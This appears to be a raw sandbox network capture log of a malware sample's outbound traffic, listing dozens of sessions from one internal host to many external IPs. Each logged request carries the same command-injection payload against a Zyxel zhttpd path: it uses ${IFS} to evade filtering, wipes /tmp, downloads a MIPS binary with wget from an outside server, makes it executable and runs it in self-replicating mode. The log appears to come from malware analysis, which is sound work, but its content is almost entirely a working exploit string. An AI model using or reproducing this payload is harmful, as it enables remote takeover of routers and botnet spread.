                                        Mar 31, 2024 09:21:59.384569883 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6479192.168.2.234373053.84.153.170443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:59.384619951 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6480192.168.2.235364064.93.175.92443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:59.384654045 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6481192.168.2.2344716202.241.66.183443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:59.384684086 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6482192.168.2.2333378122.130.111.241443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:59.384738922 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6483192.168.2.233284892.212.211.148443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:59.384777069 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6484192.168.2.235538661.152.0.98443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:59.384816885 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6485192.168.2.234913253.242.247.27443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:59.384845972 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6486192.168.2.2346362168.39.106.31443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:59.384891987 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6487192.168.2.2354022173.216.29.230443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:59.384933949 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6488192.168.2.234293414.168.143.112443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:59.384974003 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6489192.168.2.2345548105.57.249.108443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:59.385023117 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6490192.168.2.2347742190.93.80.189443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:59.385055065 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6491192.168.2.234905887.248.42.234443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:59.385103941 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6492192.168.2.23435648.201.49.225443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:59.385144949 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6493192.168.2.2333354176.128.33.252443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:59.385200024 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6494192.168.2.2335948181.51.49.124443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:59.385234118 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6495192.168.2.235653631.58.215.169443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:59.385271072 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6496192.168.2.2333502189.2.129.88443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:59.385322094 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6497192.168.2.234953645.12.38.173443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:59.385364056 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6498192.168.2.2344432199.87.119.95443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:59.385411978 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6499192.168.2.2354470221.240.34.244443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:59.385442972 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6500192.168.2.2343476116.119.121.75443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:59.385489941 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6501192.168.2.23561928.148.105.220443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:59.385526896 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6502192.168.2.234010448.163.51.160443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:59.385570049 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6503192.168.2.233368438.33.148.243443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:59.385610104 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6504192.168.2.2336006173.136.158.119443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:59.385659933 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6505192.168.2.2345578139.223.114.123443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:59.385691881 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6506192.168.2.2360630148.7.172.103443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:59.385737896 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6507192.168.2.233391042.134.85.2443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:59.385781050 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6508192.168.2.2342478162.187.159.238443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:59.385831118 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6509192.168.2.2339784100.152.53.145443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:59.385862112 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6510192.168.2.235356453.216.71.137443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:59.385921955 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6511192.168.2.2333418153.126.142.172443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:59.385945082 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6512192.168.2.2349318171.70.245.159443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:59.385987997 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6513192.168.2.235070066.132.173.23443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:59.386039019 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6514192.168.2.2342032171.202.137.21443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:59.386070967 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6515192.168.2.2338736210.211.184.117443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:59.386104107 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6516192.168.2.2339164173.180.196.220443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:59.386132956 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6517192.168.2.2348580152.198.135.187443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:59.386169910 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6518192.168.2.235919017.161.212.189443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:59.386208057 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6519192.168.2.2336816160.229.110.29443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:59.386262894 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6520192.168.2.235470241.149.66.118443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:59.386298895 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6521192.168.2.233548641.191.117.220443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:59.386337042 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6522192.168.2.2344406135.177.86.236443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:59.386378050 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6523192.168.2.2357114100.34.180.64443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:59.386415958 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6524192.168.2.2353354118.236.66.152443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:59.386465073 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6525192.168.2.2360634151.234.96.137443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:59.386514902 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6526192.168.2.235458087.154.245.15443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:59.386543036 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6527192.168.2.235436414.217.22.31443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:59.386598110 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6528192.168.2.2356028213.94.209.112443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:59.386646032 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6529192.168.2.234604423.95.205.128443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:59.386682034 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6530192.168.2.2335204188.215.112.221443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:59.386733055 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6531192.168.2.2336450112.160.174.229443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:59.386774063 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6532192.168.2.2338684218.60.223.0443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:59.386806011 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6533192.168.2.234485665.93.237.93443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:59.386859894 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6534192.168.2.235630059.199.203.162443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:59.386893034 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6535192.168.2.235488080.193.252.20443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:59.386919022 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6536192.168.2.2354504111.54.11.165443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:59.386975050 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6537192.168.2.234030866.105.213.2443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:59.387010098 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6538192.168.2.2356790112.62.106.50443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:59.387057066 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6539192.168.2.2350144202.204.254.73443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:59.387094975 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6540192.168.2.235404898.19.182.226443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:59.387145996 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6541192.168.2.23444029.204.56.44443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:59.387181044 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6542192.168.2.235966272.197.217.15443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:59.387218952 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6543192.168.2.2354062208.233.147.251443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:59.387253046 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6544192.168.2.2352666197.181.48.140443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:59.387304068 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6545192.168.2.2339304112.161.229.241443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:59.387351036 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6546192.168.2.235438661.250.74.80443
                                        TimestampBytes transferredDirectionData
